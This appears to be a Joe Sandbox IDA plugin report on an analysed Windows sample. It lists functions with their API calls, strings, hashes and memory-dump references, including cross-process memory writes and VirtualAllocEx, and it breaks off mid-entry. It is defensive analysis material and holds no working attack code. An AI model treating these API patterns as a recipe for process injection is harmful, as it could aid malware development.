GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0101AB10

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9c70bbad7136e18c682c8156625d6145847464a65565ef8ec464e4c97ade0a62
Instruction ID: 4ff4a1134e2b924bb46e818887a46cb8653d8789d213073f1eafe2a2814c9275
Opcode Fuzzy Hash: 9c70bbad7136e18c682c8156625d6145847464a65565ef8ec464e4c97ade0a62
Instruction Fuzzy Hash: 6DF04471301244BFEB211EA5EC98F673BADFF45654F000469F5C1C7155C666D8058B60

Function 0101EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0101EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0101ECAB
MessageBeep.USER32(00000000), ref: 0101ECC3
KillTimer.USER32(?,0000040A), ref: 0101ECDF
EndDialog.USER32(?,00000001), ref: 0101ECF9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 999d44abde9f24622dbf86b98e9d73c5068818d4e2ef83e4a79063983d3b1bb0
Instruction ID: 4b8646973e998db61feb7e374ba17e13441fce7521f57b5571d51a4ecf88ee3b
Opcode Fuzzy Hash: 999d44abde9f24622dbf86b98e9d73c5068818d4e2ef83e4a79063983d3b1bb0
Instruction Fuzzy Hash: CE01D6306007099BEB315B50DE4EB9A7BB8FB00B05F000559FAC3A14E4DBFDA985CB80

Function 00FFB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00FFB0BA
StrokeAndFillPath.GDI32(?,?,0105E680,00000000,?,?,?), ref: 00FFB0D6
SelectObject.GDI32(?,00000000), ref: 00FFB0E9
DeleteObject.GDI32 ref: 00FFB0FC
StrokePath.GDI32(?), ref: 00FFB117

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: bb83cedc65f35c639b46a7312363f6a503836f600c4d30a1caf3fa519414d5e6
Instruction ID: 761aee306d1a116609eda8b49fd591029702447583ff39209ee6635c12099296
Opcode Fuzzy Hash: bb83cedc65f35c639b46a7312363f6a503836f600c4d30a1caf3fa519414d5e6
Instruction Fuzzy Hash: 2BF0F434100A48EFD7319FA5E80D7653F65AB143B1F448315F5E5850F8C77A4566DF50

Function 0102F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0102F2DA
CoCreateInstance.OLE32(0106DA7C,00000000,00000001,0106D8EC,?), ref: 0102F2F2
CoUninitialize.OLE32 ref: 0102F555

Strings

.lnk, xrefs: 0102F28B, 0102F290, 0102F29E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: b4aa25f7b7da9d3cccf7a74f79697d58db6b294b8c397c29b9f860539cba90a1
Instruction ID: bd2398df3f18ef45fc7f242d660643d20c63ca0eb200f554a97e5d4023db27a6
Opcode Fuzzy Hash: b4aa25f7b7da9d3cccf7a74f79697d58db6b294b8c397c29b9f860539cba90a1
Instruction Fuzzy Hash: 43A13B71104205AFD300EF64CC81DABB7ECEF98714F40491DF695971A2EBB4EA49DBA2

Function 0102E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FE53B1,?,?,00FE61FF,?,00000000,00000001,00000000), ref: 00FE662F

CoInitialize.OLE32(00000000), ref: 0102E85D
CoCreateInstance.OLE32(0106DA7C,00000000,00000001,0106D8EC,?), ref: 0102E876
CoUninitialize.OLE32 ref: 0102E893

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

Strings

.lnk, xrefs: 0102E83B, 0102E84D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 2e78a80bd779f3076d73c071f262c9a38957dbb0b9459c1d76ac2704a6d3a7d8
Instruction ID: a8826c4782b6f25ff1c15c70fc03d2c9703126fe27d18e242eeac85252767639
Opcode Fuzzy Hash: 2e78a80bd779f3076d73c071f262c9a38957dbb0b9459c1d76ac2704a6d3a7d8
Instruction Fuzzy Hash: 90A145756043119FCB50DF15C884D2EBBE9BF88710F048989F99A9B3A2CB35EC45CB91

Function 0100325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 010032ED

Part of subcall function 0100E0D0: __87except.LIBCMT ref: 0100E10B

Strings

pow, xrefs: 010032C5, 010032E2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 8e2d69d94bbec0fbaf68d8c7ed1ff09a3479a0548d4e3848fd46d8815c179e9e
Instruction ID: 8beb3f91fbdeb7ef2d2ae2c370e2538d0d775c576708b4fd399ed1998c627b3e
Opcode Fuzzy Hash: 8e2d69d94bbec0fbaf68d8c7ed1ff09a3479a0548d4e3848fd46d8815c179e9e
Instruction Fuzzy Hash: A4511771E082029EFB67B61CC9403FE6FD4BB40750F248DA9E4D5AA2D9DF398494C746

Function 01024606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0107DC50,?,0000000F,0000000C,00000016,0107DC50,?), ref: 01024645

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 010246C5

Strings

REMOVE, xrefs: 01024676
THIS, xrefs: 01024703

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 28e6a5e15e78658a9f631ebcd62f5b0dfa02df9785a9ce0ee7199806afd75baf
Instruction ID: 3dd74044326d9d24283c21dc33cc9b1f8e02b12abba1dc2f470b8abd6646f6e8
Opcode Fuzzy Hash: 28e6a5e15e78658a9f631ebcd62f5b0dfa02df9785a9ce0ee7199806afd75baf
Instruction Fuzzy Hash: 9D419534A002699FCF01DFA9C881AAEB7F5FF49304F048059E9A6EB252DB74DD45DB50

Function 0101C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0102430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0101BC08,?,?,00000034,00000800,?,00000034), ref: 01024335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0101C1D3

Part of subcall function 010242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0101BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 01024300

Part of subcall function 0102422F: GetWindowThreadProcessId.USER32(?,?), ref: 0102425A
Part of subcall function 0102422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0101BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0102426A
Part of subcall function 0102422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0101BBCC,00000034,?,?,00001004,00000000,00000000), ref: 01024280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0101C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0101C28D

Strings

@, xrefs: 0101C2A5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a2e1a7df5162a2ea6efab69e03fa355c0afeafe43b421a153480e8b611d20c43
Instruction ID: 737b25407099888b4e2e47093eb3a8e46912ee99ed4422b689ab2c9475c5caeb
Opcode Fuzzy Hash: a2e1a7df5162a2ea6efab69e03fa355c0afeafe43b421a153480e8b611d20c43
Instruction Fuzzy Hash: 09414D72900229AFDB11DFA4CD81AEEB7B8FF19700F004095EA85B7180DB75AE49CB61

Function 0104A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0107DC00,00000000,?,?,?,?), ref: 0104A6D8
GetWindowLongW.USER32 ref: 0104A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0104A705

Strings

SysTreeView32, xrefs: 0104A6AA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e598fd18b5d8de6509e27d587ad1d501a780d2da79f5d0b8d8de455af76cc011
Instruction ID: 6214c7baa903a8541c07772348025230405368108f82154f9632e399b4ba2505
Opcode Fuzzy Hash: e598fd18b5d8de6509e27d587ad1d501a780d2da79f5d0b8d8de455af76cc011
Instruction Fuzzy Hash: 7131D07124020AAFDB218E78CC80BEA7BA9FF48334F144329F9B6D31E1C734A8509B50

Function 0104A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0104A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0104A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0104A196

Strings

SysMonthCal32, xrefs: 0104A129

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: bd150a6784c3079147324e0d395b62589c872e6df73e8268a60e806c9f0a535f
Instruction ID: f086a3cd8d1ace175f947083877ba72fa997085a6eee4fbae09ec2fed06602b3
Opcode Fuzzy Hash: bd150a6784c3079147324e0d395b62589c872e6df73e8268a60e806c9f0a535f
Instruction Fuzzy Hash: 8321A372650218BBEF128E94CC81FEA3BB5FF4C754F110124FA96AB1E0D6B5A851CB90

Function 0104A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0104A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0104A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0104A956

Strings

msctls_updown32, xrefs: 0104A8BB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: fbb7eef8fad7dd84aeb5007c13d85ca5f2bf7c02367e4282d5de787bf828269e
Instruction ID: bad50109883b380e8e2cea3ca4795aabce8901d63f759daab857de022724b4e3
Opcode Fuzzy Hash: fbb7eef8fad7dd84aeb5007c13d85ca5f2bf7c02367e4282d5de787bf828269e
Instruction Fuzzy Hash: A62181F9600209AFEB11DF58CCD1DB737ADEB4E294B450059FA859B291CA35EC118B60

Function 010499A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01049A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01049A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01049A65

Strings

Listbox, xrefs: 010499FD

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 85b2b66e9ad7b39d6614cb8308dc67a1256c8cc232e772013cd5740cdc449764
Instruction ID: b69522568e828887b340a43f22625f65876c48ca6017fb0b521200dc69093bde
Opcode Fuzzy Hash: 85b2b66e9ad7b39d6614cb8308dc67a1256c8cc232e772013cd5740cdc449764
Instruction Fuzzy Hash: 9821C272610118BFEF228F58CC85EBF3BAAEF8D764F018174F9949B1A1C6759C1187A0

Function 0104A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0104A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0104A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0104A48F

Strings

msctls_trackbar32, xrefs: 0104A444

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 98dcbc0df7140bb2df425c5d669f5800b94e9ca0c7bd5840201043e6dd2a762e
Instruction ID: 89a16621e0b64a34a43d8135e44f26263a67856b530d144e54635dcad744df8b
Opcode Fuzzy Hash: 98dcbc0df7140bb2df425c5d669f5800b94e9ca0c7bd5840201043e6dd2a762e
Instruction Fuzzy Hash: 5B11E7B1240208BFEF215E65CC49FAB3BA9EFC8758F014128FB8597091D676A411D720

Function 01002287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,01002350,?), ref: 010022A1
GetProcAddress.KERNEL32(00000000), ref: 010022A8

Strings

combase.dll, xrefs: 0100229C
RoInitialize, xrefs: 01002290

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: c056048a8fb599a0656203e3d5bd3dadf65572b6404a6923f22ad25bf0975b14
Instruction ID: b0de5dd6782cf78af352c589cfe2f485aff03dd65cb83ff0f35b3b760386cf32
Opcode Fuzzy Hash: c056048a8fb599a0656203e3d5bd3dadf65572b6404a6923f22ad25bf0975b14
Instruction Fuzzy Hash: FBE0E574794705ABEAB15BA6AC5DB5836A8B740702F504064F1C2DA09CCBBE5041DB05

Function 0100235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,01002276), ref: 01002376
GetProcAddress.KERNEL32(00000000), ref: 0100237D

Strings

combase.dll, xrefs: 01002371
RoUninitialize, xrefs: 01002365

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: e1a4c6785df4ce29c53bef3a1ca27f884c3a01d867eb0b5cccec7c462c2d0dfb
Instruction ID: cab1f80b2588fe4abb8f45283b94292780bf4c5ce733d433fddfb8eb5410ee88
Opcode Fuzzy Hash: e1a4c6785df4ce29c53bef3a1ca27f884c3a01d867eb0b5cccec7c462c2d0dfb
Instruction Fuzzy Hash: 66E0B6B0744704EBEB715FA2ED1DB553AA8B704702F504454F1CAD60ACCBBFA050CB14

Function 0105AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0105AC60
__swprintf.LIBCMT ref: 0105AC94

Strings

WIN_XPe, xrefs: 0105ACD3
%.3d, xrefs: 0105AC6E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 6c9f64d8eb17e7c80edbe8416c3d1434a5b4977d87e11f4f5240fc38f9ff058a
Instruction ID: c695ba4a72d65a13f021f3fe9f45fa49a68af10ac5eaf8bcc6f9664abebdec79
Opcode Fuzzy Hash: 6c9f64d8eb17e7c80edbe8416c3d1434a5b4977d87e11f4f5240fc38f9ff058a
Instruction Fuzzy Hash: EDE0EC7190461DDBCBA19B90CD059FE77BCAB14741F4001D2ED8AA2014D6399B849B21

Function 00FE42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00FE42EC,?,00FE42AA,?), ref: 00FE4304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FE4316

Strings

kernel32.dll, xrefs: 00FE42FF
Wow64RevertWow64FsRedirection, xrefs: 00FE4310

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: c2bb8cad626169f12b7aa03ad21eae0c025e5ca1e99ba56fda04a6abeea5416b
Instruction ID: c9915a10e8f4d6a674833441b70ed663be976cceec94e81c35bd908adbd07c70
Opcode Fuzzy Hash: c2bb8cad626169f12b7aa03ad21eae0c025e5ca1e99ba56fda04a6abeea5416b
Instruction Fuzzy Hash: 43D0C774944712FFDB305F77E45C64276D8AB14711B10441EE5D5DA228D7B4D884AF50

Function 01042205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

